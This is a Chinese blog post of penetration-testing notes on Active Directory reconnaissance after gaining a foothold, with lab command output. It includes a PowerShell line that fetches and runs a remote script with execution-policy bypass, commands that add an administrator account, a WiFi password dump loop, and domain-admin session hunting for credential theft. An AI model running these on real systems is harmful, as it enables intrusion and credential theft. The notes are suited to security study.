域渗透-信息收集

2021年02月21日安全小记约2.7k字预计需要11分钟

内网渗透之域渗透

基本信息

# 网络信息
$ ipconfig /all    # 查询网络配置信息

# 系统信息
$ systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"  # 查询操作系统和软件信息
$ systeminfo       # 查看补丁列表
$ wmic qfe get Caption,Description,HotFixID,InstallOn # 查看安装在系统的补丁

# 服务信息
$ wmic service list brief  # 查询本机服务信息
$ wmic process list brief  # 查询进程列表
$ wmic startup get commond,caption # 查看启动程序信息

# 用户信息
$ net user                       # 查询用户列表
$ net localgroup Administrators  # 本地管理员
$ query user || qwinsta          # 当前在线用户

# 进程信息
$ tasklist
$ wmic process list brief

# 其它信息
$ netstat -ano  # 查询端口列表
$ net share     # 查询本机共享列表
$ route print   # 路由表
$ arp -a        # ARP表
$ ipconfig /displaydns    # 查看dns缓存
$ netsh firewall show config  # 查询防火墙相关配置

查询当前权限

获取一台主机后，一般有3种情况：
- 本地普通用户，win-2008\user
- 本地管理员用户，win7-test\administrator
- 域内用户，hacker\administrator
其中本地普通用户只能查询本机信息，不能查询域内信息，而本地管理员和域内用户均可查询域内信息。
域内所有查询都通过域控制器(DC)实现，而这个查询会自动使用Kerberos协议进行认证，无须输入账号密码。
获取域SID
- 当前域hack-naraku的SID：S-1-5-21-1481718049-2714097393-3961720286
- 域用户winuser的SID：S-1-5-21-1481718049-2714097393-3961720286-1108

$ whoami

用户名              SID
=================== ==============================================
hack-naraku\winuser S-1-5-21-1481718049-2714097393-3961720286-1108

查询指定用户信息
- 该用户在本地组中没有本地管理员权限
- 在域中属于Domain Users组

1
2
3

$ net user winuser /domain
本地组成员
全局组成员             *Domain Users

判断是否存在域

使用ipconfig

1 2	`$ ipconfig /all $ nslookup <DNS服务器>`

查询系统信息
- 域：域名。如果域为WORKGROUP则表示当前服务器不在域内
- 登录服务器：域控制器

1	`$ systeminfo`

查询当前登录域及登录用户
- 工作站域DNS名称：域名。如果为WORKGROUP则表示当前为非域环境
- 登录域：用于表示当前表示的用户是域用户还是本地用户

1	`$ net config workstation`

判断主域
- 正常执行：存在域，且当前用户是域用户
- 拒绝访问：存在域，但当前用户不是域用户
- 找不到域WORKGROUP的域控制器：不存在域

1	`$ net time /domain`

探测域内存活主机

NetBIOS探测

nbtscan.exe：一个命令行工具，用于扫描目标网络中开放的NetBIOS名称服务器

$ nbtscan.exe 192.168.1.0/24

192.168.1.7     HACK-NARAKU\WIN7                SHARING
192.168.1.12    HACK-NARAKU\DC                  SHARING DC
*timeout (normal end of scan)

ICMP探测

对指定网段中的每个IP地址使用ping命令

$ for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

来自 192.168.1.7 的回复: 字节=32 时间<1ms TTL=128
来自 192.168.1.12 的回复: 字节=32 时间=1ms TTL=128

ARP探测

arp-scan.exe

$ arp-scan.exe -t 192.168.1.0/24

Reply that 00:50:56:C0:00:01 is 192.168.1.1 in 2.870200
Reply that 00:0C:29:0A:7C:7F is 192.168.1.7 in 0.060100
Reply that 00:0C:29:93:97:DC is 192.168.1.12 in 16.301800
Reply that 00:50:56:EA:98:CF is 192.168.1.254 in 15.253300
Reply that 00:0C:29:0A:7C:7F is 192.168.1.255 in 0.102700

扫描域内端口

Metasploit端口扫描：MSF提供多种端口扫描技术，还提供与其它扫描工具的接口
- 可在msfconsole下运行search portscan搜索端口扫描模块
- 这里使用的是auxiliary/scanner/portscan/tcp

$ msfconsole
msf5 > use auxiliary/scanner/portscan/tcp 
msf5 auxiliary(scanner/portscan/tcp) > show options
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.12
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 1-1024
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.1.12:         - 192.168.1.12:53 - TCP OPEN
.......

[+] 192.168.1.12:         - 192.168.1.12:636 - TCP OPEN
[*] 192.168.1.12:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap

1	`$ nmap -sP 192.168.1.0/24`

Netcat：端口Banner信息

1	`$ nc -nv 192.168.1.12 22`

Nishang中的Scan/Invoke-PortScan.ps1模块
PowerSploit中的Recon/Invoke-PortScan.ps1脚本

# 远程下载脚本并执行
$ powershell.exe -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '80,445,1433,8080,3389' -oA temp.txt"

# 执行本地ps脚本
$ powershell.exe -nop -exec bypass -c "Import-Module C:\Invoke-Portscan.ps1; Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '80,445,1433,8080,3389' -oA temp.txt"

其它
- telnet：需要先开启telnet服务

1	`$ telnet 192.168.1.12 22`

- S扫描器：早期的一个扫描器

域信息

需要先启动Computer Browser服务

$ net view /domain                      # 查询域
$ net view /domain:HACK-NARAKU          # 查询域内所有计算机
$ net group /domain                     # 查询域内所有用户组
$ net group "domain computers" /domain  # 查询所有域成员
$ net accounts /domain                  # 查询域密码策略

nltest信任域

信任域：可以在工作组里查询，查询内网是否有域环境
- 参考：Nltest相关命令

$ nltest /domain_trusts

# 返回所有信任 192.168.1.7 的域
$ nltest /domain_trusts /all_trusts /v /server:<域控IP>

# 返回域控和其相对应的IP地址,XXXXX是上一条命令结果中的一个域
$ nltest /dsgetdc:<XXXXX> /server:192.168.1.12

查找域控

查看域控的机器名

$ nltest /DCLIST:hack-naraku

获得域“hack-naraku”中 DC 的列表(从“\\DC”中)。
DC.hack.naraku [PDC]  [DS] 站点: Default-First-Site-Name
此命令成功完成

查看域控的主机名

$ nslookup -type=SRV _ldap._tcp

DNS request timed out.
timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.12

_ldap._tcp.hack.naraku  SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = dc.hack.naraku
dc.hack.naraku  internet address = 192.168.1.12

查看时间

1
2
3

$ net time /domain

\\DC.hack.naraku 的当前时间是 2020/10/19 12:38:28

查看域控组

$ net group "Domain Controllers" /domain

这项请求将在域 hack.naraku 的域控制器处理。

组名     Domain Controllers
注释     域中所有域控制器

成员

-------------------------------------------------------------------------------
DC$
命令成功完成。

域用户信息

查询所有域用户列表

1
2
3

$ net user /domain               # 向域控进行查询
$ wmic useraccount get /all      # 获取域内用户信息
$ net localgroup administrators  # 查询本地管理员组用户

查询域管理员用户

1 2	`$ net group "Domain Admins" /domain # 查询域管理员用户 $ net group "Enterprise Admins" /domain # 查询管理员用户组`

定位域管

参考：定位域管理员

概述

在一个域中，当计算机加入域后，会默认给域管理员赋予本地系统管理员权限。因此，域管理员均可以访问本地计算机，且具备完全控制权限。

定位域内管理员的两种渠道：日志和会话。

日志是指本地机器的管理员日志，可以使用脚本或Wevtutil工具导出并查看。
会话是指域内每台机器的登陆会话，可以使用netsess.exe或PowerView等工具查询（可匿名查询，无需权限）。

PsLoggedOn

PsLoggedOn.exe：可以查看本地登录的用户

原理：通过检验注册表里HKEY_USERS的key值来查询谁登陆过机器(调用NetSessionEnum API)
限制：部分功能需要管理员权限

1	`$ PsLoggedon.exe`

PVEFindADUser

PVEFindADUser.exe：用于查找Active Directory用户的登录位置、枚举域用户，以及查找在特定计算机上登陆的用户，包括本地用户、通过RDP登陆的用户、用于运行服务和计划任务的用户。

限制：运行该工具需要配置.NET Framework 2.0环境，并且需要具有管理员权限。

1	`$ PVEFindADUser.exe -current`

Netview

Netview.exe：使用WinAPI枚举系统，利用NetSessionEnum找寻登陆会话，利用NetShareEnum找寻共享，利用NetWkstaUserEnum枚举登陆用户。同时，netview.exe能够查询共享入口和有价值的用户。

编译版本：https://malicious.link/projects/netview.exe
限制：绝大多数功能不需要管理员权限

1	`$ netview.exe -d`

Nmap的NSE脚本

Smb-enum-sessions.nse：如果存在域账户或者本地账户，就可以使用该脚本获取远程机器的登陆会话

限制：不需要管理员权限

1	`$ nmap --script=smb-enum-sessions 192.168.1.1`

脚本	描述
smb-enum-domains	尝试枚举系统上的域及其策略
smb-enum-users	枚举远程Windows系统上的用户，并提供尽可能多的信息
smb-enum-shares	便利远程主机共享目录
smb-enum-processes	通过SMB从远程服务器提取进程列表，可以知道目标主机运行哪些软件。需要管理员权限
smb-enum-sessions	枚举在本地或通过SMB共享登录到系统的用户
smb-os-discovery	尝试通过SMB协议（端口445或139）确定操作系统，计算机名称，域，工作组和当前时间。

PowerView

PowerView是一款依赖powershell和WMI对内网进行查询的常用渗透测试脚本，集成在powersploit工具包中，是一个收集域信息很好用的脚本。

1 2	`# 定位域管理员 $ powershell.exe -exec bypass -c "Import-Module C:\PowerView.ps1; Invoke-UserHunter"`

查找域管理进程

一个典型的域权限提升过程，通常围绕着收集明文凭据或通过Mimikatz提权等方法。在获取了管理员权限的系统中寻找域管理员登录进程，进而收集域管理员的凭据。

1
2
3

$ tasklist /v                             # 列出本机的所有进程及进程用户
$ net group "Domain Admins" /domain       # 获取域管理员列表
$ net group "Domain Controllers" /domain  # 查询域控制器列表

Powershell收集信息

$ Get-ExecutionPolicy               # 查看执行策略
$ Set-ExecutionPolicy Unrestricted  # 修改执行策略(需管理员权限)

# 利用PowerView
$ Import-Module .\PowerView.ps1
Get-NetDomain            # 获取当前用户所在域的名称
Get-NetUser              # 获取所有用户的详细信息
Get-NetComputer          # 获取域内所有机器的详细信息
Get-NetShare             # 获取当前域内所有的共享信息
Get-ADObject             # 获取活动目录的对象（内容超级多）
Invoke-UserHunter        # 获取域用户登陆的计算机信息，以及该用户是否有本地管理员权限
Invoke-ProcessHunter     # 通过查询域内所有的机器进程找到特定用户

其它

用户信息
- 权限：system > administrator > user

$ net user /domain                        # 查看域用户
$ net group "domain admins" /domain       # 查看域管理员
$ net group "domain controllers" /domain  # 查看域控制器
$ nltest /domain_trusts  # 查看域信任

# 其它
$ query user                                 # 查看在线用户
$ net user                                   # 查看全部用户
$ net user naraku                            # 查看指定用户: net user <username> 
$ net user naraku pwd123. /add               # 添加用户,默认Users组: net user <username> <password>  /add    
$ net localgroup administrators naraku /add  # 添加到Administrators组: net localgroup administrators <username> /add

# 查看wifi密码
$ for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear